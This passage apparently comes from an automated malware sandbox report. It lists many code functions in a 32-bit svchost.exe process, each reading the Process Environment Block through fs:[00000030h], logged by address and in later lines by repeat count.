            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]2_2_03AB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]2_2_03AB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03A6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03A6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E627 mov eax, dword ptr fs:[00000030h]2_2_03A4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A66620 mov eax, dword ptr fs:[00000030h]2_2_03A66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68620 mov eax, dword ptr fs:[00000030h]2_2_03A68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3262C mov eax, dword ptr fs:[00000030h]2_2_03A3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE609 mov eax, dword ptr fs:[00000030h]2_2_03AAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72619 mov eax, dword ptr fs:[00000030h]2_2_03A72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF866E mov eax, dword ptr fs:[00000030h]2_2_03AF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF866E mov eax, dword ptr fs:[00000030h]2_2_03AF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A660 mov eax, dword ptr fs:[00000030h]2_2_03A6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A660 mov eax, dword ptr fs:[00000030h]2_2_03A6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A62674 mov eax, dword ptr fs:[00000030h]2_2_03A62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4C640 mov eax, dword ptr fs:[00000030h]2_2_03A4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]2_2_03AB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]2_2_03AB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]2_2_03AB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A545B1 mov eax, dword ptr fs:[00000030h]2_2_03A545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A545B1 mov eax, dword ptr fs:[00000030h]2_2_03A545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32582 mov eax, dword ptr fs:[00000030h]2_2_03A32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32582 mov ecx, dword ptr fs:[00000030h]2_2_03A32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A64588 mov eax, dword ptr fs:[00000030h]2_2_03A64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E59C mov eax, dword ptr fs:[00000030h]2_2_03A6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A325E0 mov eax, dword ptr fs:[00000030h]2_2_03A325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C5ED mov eax, dword ptr fs:[00000030h]2_2_03A6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C5ED mov eax, dword ptr fs:[00000030h]2_2_03A6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E5CF mov eax, dword ptr fs:[00000030h]2_2_03A6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E5CF mov eax, dword ptr fs:[00000030h]2_2_03A6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A365D0 mov eax, dword ptr fs:[00000030h]2_2_03A365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03A6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03A6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6500 mov eax, dword ptr fs:[00000030h]2_2_03AC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]2_2_03A6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]2_2_03A6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]2_2_03A6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38550 mov eax, dword ptr fs:[00000030h]2_2_03A38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38550 mov eax, dword ptr fs:[00000030h]2_2_03A38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A364AB mov eax, dword ptr fs:[00000030h]2_2_03A364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A644B0 mov ecx, dword ptr fs:[00000030h]2_2_03A644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABA4B0 mov eax, dword ptr fs:[00000030h]2_2_03ABA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEA49A mov eax, dword ptr fs:[00000030h]2_2_03AEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A304E5 mov ecx, dword ptr fs:[00000030h]2_2_03A304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]2_2_03A2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]2_2_03A2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]2_2_03A2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C427 mov eax, dword ptr fs:[00000030h]2_2_03A2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A430 mov eax, dword ptr fs:[00000030h]2_2_03A6A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]2_2_03A68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]2_2_03A68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68402 mov eax, dword ptr fs:[00000030h]2_2_03A68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABC460 mov ecx, dword ptr fs:[00000030h]2_2_03ABC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]2_2_03A5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]2_2_03A5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5A470 mov eax, dword ptr fs:[00000030h]2_2_03A5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E443 mov eax, dword ptr fs:[00000030h]2_2_03A6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEA456 mov eax, dword ptr fs:[00000030h]2_2_03AEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2645D mov eax, dword ptr fs:[00000030h]2_2_03A2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5245A mov eax, dword ptr fs:[00000030h]2_2_03A5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40BBE mov eax, dword ptr fs:[00000030h]2_2_03A40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40BBE mov eax, dword ptr fs:[00000030h]2_2_03A40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03AE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03AE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]2_2_03A38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]2_2_03A38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38BF0 mov eax, dword ptr fs:[00000030h]2_2_03A38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EBFC mov eax, dword ptr fs:[00000030h]2_2_03A5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABCBF0 mov eax, dword ptr fs:[00000030h]2_2_03ABCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]2_2_03A50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]2_2_03A50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50BCB mov eax, dword ptr fs:[00000030h]2_2_03A50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]2_2_03A30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]2_2_03A30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30BCD mov eax, dword ptr fs:[00000030h]2_2_03A30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADEBD0 mov eax, dword ptr fs:[00000030h]2_2_03ADEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EB20 mov eax, dword ptr fs:[00000030h]2_2_03A5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EB20 mov eax, dword ptr fs:[00000030h]2_2_03A5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF8B28 mov eax, dword ptr fs:[00000030h]2_2_03AF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF8B28 mov eax, dword ptr fs:[00000030h]2_2_03AF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04B00 mov eax, dword ptr fs:[00000030h]2_2_03B04B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAEB1D mov eax, dword ptr fs:[00000030h]2_2_03AAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2CB7E mov eax, dword ptr fs:[00000030h]2_2_03A2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE4B4B mov eax, dword ptr fs:[00000030h]2_2_03AE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE4B4B mov eax, dword ptr fs:[00000030h]2_2_03AE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]2_2_03B02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]2_2_03B02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]2_2_03B02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B02B57 mov eax, dword ptr fs:[00000030h]2_2_03B02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6B40 mov eax, dword ptr fs:[00000030h]2_2_03AC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6B40 mov eax, dword ptr fs:[00000030h]2_2_03AC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFAB40 mov eax, dword ptr fs:[00000030h]2_2_03AFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD8B42 mov eax, dword ptr fs:[00000030h]2_2_03AD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28B50 mov eax, dword ptr fs:[00000030h]2_2_03A28B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADEB50 mov eax, dword ptr fs:[00000030h]2_2_03ADEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38AA0 mov eax, dword ptr fs:[00000030h]2_2_03A38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38AA0 mov eax, dword ptr fs:[00000030h]2_2_03A38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86AA4 mov eax, dword ptr fs:[00000030h]2_2_03A86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA80 mov eax, dword ptr fs:[00000030h]2_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04A80 mov eax, dword ptr fs:[00000030h]2_2_03B04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68A90 mov edx, dword ptr fs:[00000030h]2_2_03A68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6AAEE mov eax, dword ptr fs:[00000030h]2_2_03A6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6AAEE mov eax, dword ptr fs:[00000030h]2_2_03A6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]2_2_03A86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]2_2_03A86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A86ACC mov eax, dword ptr fs:[00000030h]2_2_03A86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30AD0 mov eax, dword ptr fs:[00000030h]2_2_03A30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A64AD0 mov eax, dword ptr fs:[00000030h]2_2_03A64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A64AD0 mov eax, dword ptr fs:[00000030h]2_2_03A64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA24 mov eax, dword ptr fs:[00000030h]2_2_03A6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5EA2E mov eax, dword ptr fs:[00000030h]2_2_03A5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A54A35 mov eax, dword ptr fs:[00000030h]2_2_03A54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A54A35 mov eax, dword ptr fs:[00000030h]2_2_03A54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA38 mov eax, dword ptr fs:[00000030h]2_2_03A6CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABCA11 mov eax, dword ptr fs:[00000030h]2_2_03ABCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]2_2_03A6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]2_2_03A6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6CA6F mov eax, dword ptr fs:[00000030h]2_2_03A6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADEA60 mov eax, dword ptr fs:[00000030h]2_2_03ADEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AACA72 mov eax, dword ptr fs:[00000030h]2_2_03AACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AACA72 mov eax, dword ptr fs:[00000030h]2_2_03AACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h]2_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A36A50 mov eax, dword ptr fs:[00000030h] (listed 3 times)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A40A5B mov eax, dword ptr fs:[00000030h] (listed 2 times)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A429A0 mov eax, dword ptr fs:[00000030h] (listed 13 times)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A309AD mov eax, dword ptr fs:[00000030h] (listed 2 times)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB89B3 mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB89B3 mov eax, dword ptr fs:[00000030h] (listed 2 times)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ABE9E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A629F9 mov eax, dword ptr fs:[00000030h] (listed 2 times)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC69C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3A9D0 mov eax, dword ptr fs:[00000030h] (listed 6 times)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A649D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFA9D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB892A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC892B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAE908 mov eax, dword ptr fs:[00000030h] (listed 2 times)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ABC912 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A28918 mov eax, dword ptr fs:[00000030h] (listed 2 times)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A56962 mov eax, dword ptr fs:[00000030h] (listed 3 times)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A7096E mov eax, dword ptr fs:[00000030h] (listed 2 times)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A7096E mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD4978 mov eax, dword ptr fs:[00000030h] (listed 2 times)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ABC97C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AB0946 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B04940 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A30887 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ABC89D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFA8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6C8F9 mov eax, dword ptr fs:[00000030h] (listed 2 times)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5E8C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B008C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h] (listed 3 times)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A52835 mov ecx, dword ptr fs:[00000030h]
